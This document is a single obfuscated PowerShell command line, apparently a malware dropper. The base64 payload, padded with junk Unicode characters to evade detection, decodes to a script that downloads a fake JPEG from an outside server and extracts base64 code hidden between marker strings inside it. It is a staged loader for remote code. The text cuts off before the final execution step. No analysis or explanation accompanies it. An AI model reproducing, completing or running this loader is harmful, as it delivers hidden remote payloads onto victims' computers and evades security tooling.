"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J㆛ ⺞ ⏬ ⦦ ⼀Bs㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀bgBr㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀PQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀a㆛ ⺞ ⏬ ⦦ ⼀B0㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀c㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀6㆛ ⺞ ⏬ ⦦ ⼀C8㆛ ⺞ ⏬ ⦦ ⼀LwBz㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cgB2㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀dwBp㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Hc㆛ ⺞ ⏬ ⦦ ⼀cw㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bu㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀LgBj㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀bQ㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀cg㆛ ⺞ ⏬ ⦦ ⼀v㆛ ⺞ ⏬ ⦦ ⼀EY㆛ ⺞ ⏬ ⦦ ⼀aQBs㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cw㆛ ⺞ ⏬ ⦦ ⼀v㆛ ⺞ ⏬ ⦦ ⼀HY㆛ ⺞ ⏬ ⦦ ⼀YgBz㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀agBw㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Zw㆛ ⺞ ⏬ ⦦ ⼀n㆛ ⺞ ⏬ ⦦ ⼀Ds㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀Hc㆛ ⺞ ⏬ ⦦ ⼀ZQBi㆛ ⺞ ⏬ ⦦ ⼀EM㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀bgB0㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀PQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀E4㆛ ⺞ ⏬ ⦦ ⼀ZQB3㆛ ⺞ ⏬ ⦦ ⼀C0㆛ ⺞ ⏬ ⦦ ⼀TwBi㆛ ⺞ ⏬ ⦦ ⼀Go㆛ ⺞ ⏬ ⦦ ⼀ZQBj㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀BT㆛ ⺞ ⏬ ⦦ ⼀Hk㆛ ⺞ ⏬ ⦦ ⼀cwB0㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀bQ㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀E4㆛ ⺞ ⏬ ⦦ ⼀ZQB0㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀VwBl㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀QwBs㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀ZQBu㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀cgB5㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀ew㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Hc㆛ ⺞ ⏬ ⦦ ⼀bgBs㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BE㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀PQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀dwBl㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀QwBs㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀ZQBu㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀LgBE㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀dwBu㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀bwBh㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀R㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀YQ㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀aw㆛ ⺞ ⏬ ⦦ ⼀p㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀fQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀GM㆛ ⺞ ⏬ ⦦ ⼀YQB0㆛ ⺞ ⏬ ⦦ ⼀GM㆛ ⺞ ⏬ ⦦ ⼀a㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Hs㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀BX㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀aQB0㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀LQBI㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀cwB0㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀JwBG㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀aQBs㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀FQ㆛ ⺞ ⏬ ⦦ ⼀bw㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀bwB3㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀YQB0㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀Bm㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀bwBt㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bs㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀bgBr㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀t㆛ ⺞ ⏬ ⦦ ⼀EY㆛ ⺞ ⏬ ⦦ ⼀bwBy㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀ZwBy㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀dQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀QwBv㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀bwBy㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀UgBl㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀e㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀B9㆛ ⺞ ⏬ ⦦ ⼀Ds㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀GY㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Hc㆛ ⺞ ⏬ ⦦ ⼀bgBs㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BE㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀LQBu㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀dQBs㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀KQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Hs㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀bQBh㆛ ⺞ ⏬ ⦦ ⼀Gc㆛ ⺞ ⏬ ⦦ ⼀ZQBU㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀e㆛ ⺞ ⏬ ⦦ ⼀B0㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀PQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Fs㆛ ⺞ ⏬ ⦦ ⼀UwB5㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀G0㆛ ⺞ ⏬ ⦦ ⼀LgBU㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀e㆛ ⺞ ⏬ ⦦ ⼀B0㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀RQBu㆛ ⺞ ⏬ ⦦ ⼀GM㆛ ⺞ ⏬ ⦦ ⼀bwBk㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀bgBn㆛ ⺞ ⏬ ⦦ ⼀F0㆛ ⺞ ⏬ ⦦ ⼀Og㆛ ⺞ ⏬ ⦦ ⼀6㆛ ⺞ ⏬ ⦦ ⼀FU㆛ ⺞ ⏬ ⦦ ⼀V㆛ ⺞ ⏬ ⦦ ⼀BG㆛ ⺞ ⏬ ⦦ ⼀Dg㆛ ⺞ ⏬ ⦦ ⼀LgBH㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BT㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀cgBp㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Zw㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Hc㆛ ⺞ ⏬ ⦦ ⼀bgBs㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BE㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀Ck㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀cwB0㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀cgB0㆛ ⺞ ⏬ ⦦ ⼀EY㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀Gc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀Jw㆛ ⺞ ⏬ ⦦ ⼀8㆛ ⺞ ⏬ ⦦ ⼀Dw㆛ ⺞ ⏬ ⦦ ⼀QgBB㆛ ⺞ ⏬ ⦦ ⼀FM㆛ ⺞ ⏬ ⦦ ⼀RQ㆛ ⺞ ⏬ ⦦ ⼀2㆛ ⺞ ⏬ ⦦ ⼀DQ㆛ ⺞ ⏬ ⦦ ⼀XwBT㆛ ⺞ ⏬ ⦦ ⼀FQ㆛ ⺞ ⏬ ⦦ ⼀QQBS㆛ ⺞ ⏬ ⦦ ⼀FQ㆛ ⺞ ⏬ ⦦ ⼀Pg㆛ ⺞ ⏬ ⦦ ⼀+㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀ZQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀RgBs㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Zw㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀D0㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀n㆛ ⺞ ⏬ ⦦ ⼀Dw㆛ ⺞ ⏬ ⦦ ⼀P㆛ ⺞ ⏬ ⦦ ⼀BC㆛ ⺞ ⏬ ⦦ ⼀EE㆛ ⺞ ⏬ ⦦ ⼀UwBF㆛ ⺞ ⏬ ⦦ ⼀DY㆛ ⺞ ⏬ ⦦ ⼀N㆛ ⺞ ⏬ ⦦ ⼀Bf㆛ ⺞ ⏬ ⦦ ⼀EU㆛ ⺞ ⏬ ⦦ ⼀TgBE㆛ ⺞ ⏬ ⦦ ⼀D4㆛ ⺞ ⏬ ⦦ ⼀Pg㆛ ⺞ ⏬ ⦦ ⼀n㆛ ⺞ ⏬ ⦦ ⼀Ds㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BJ㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Hg㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀G0㆛ ⺞ ⏬ ⦦ ⼀YQBn㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀V㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Hg㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀Ek㆛ ⺞ ⏬ ⦦ ⼀bgBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀e㆛ ⺞ ⏬ ⦦ ⼀BP㆛ ⺞ ⏬ ⦦ ⼀GY㆛ ⺞ ⏬ ⦦ ⼀K㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BG㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀YQBn㆛ ⺞ ⏬ ⦦ ⼀Ck㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀ZQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀SQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQB4㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀PQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀aQBt㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀ZwBl㆛ ⺞ ⏬ ⦦ ⼀FQ㆛ ⺞ ⏬ ⦦ ⼀ZQB4㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀LgBJ㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Hg㆛ ⺞ ⏬ ⦦ ⼀TwBm㆛ ⺞ ⏬ ⦦ ⼀Cg㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BG㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀YQBn㆛ ⺞ ⏬ ⦦ ⼀Ck㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀Zg㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Cg㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bz㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀YQBy㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀SQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQB4㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀LQBn㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀w㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀LQBh㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀ZQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀SQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQB4㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀LQBn㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BJ㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Hg㆛ ⺞ ⏬ ⦦ ⼀KQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Hs㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BJ㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Hg㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀r㆛ ⺞ ⏬ ⦦ ⼀D0㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BG㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀YQBn㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀T㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀ZwB0㆛ ⺞ ⏬ ⦦ ⼀Gg㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀YgBh㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀ZQ㆛ ⺞ ⏬ ⦦ ⼀2㆛ ⺞ ⏬ ⦦ ⼀DQ㆛ ⺞ ⏬ ⦦ ⼀T㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀ZwB0㆛ ⺞ ⏬ ⦦ ⼀Gg㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BJ㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀Hg㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀t㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bz㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀YQBy㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀SQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀ZQB4㆛ ⺞ ⏬ ⦦ ⼀Ds㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀YQBz㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Ng㆛ ⺞ ⏬ ⦦ ⼀0㆛ ⺞ ⏬ ⦦ ⼀EM㆛ ⺞ ⏬ ⦦ ⼀bwBt㆛ ⺞ ⏬ ⦦ ⼀G0㆛ ⺞ ⏬ ⦦ ⼀YQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ 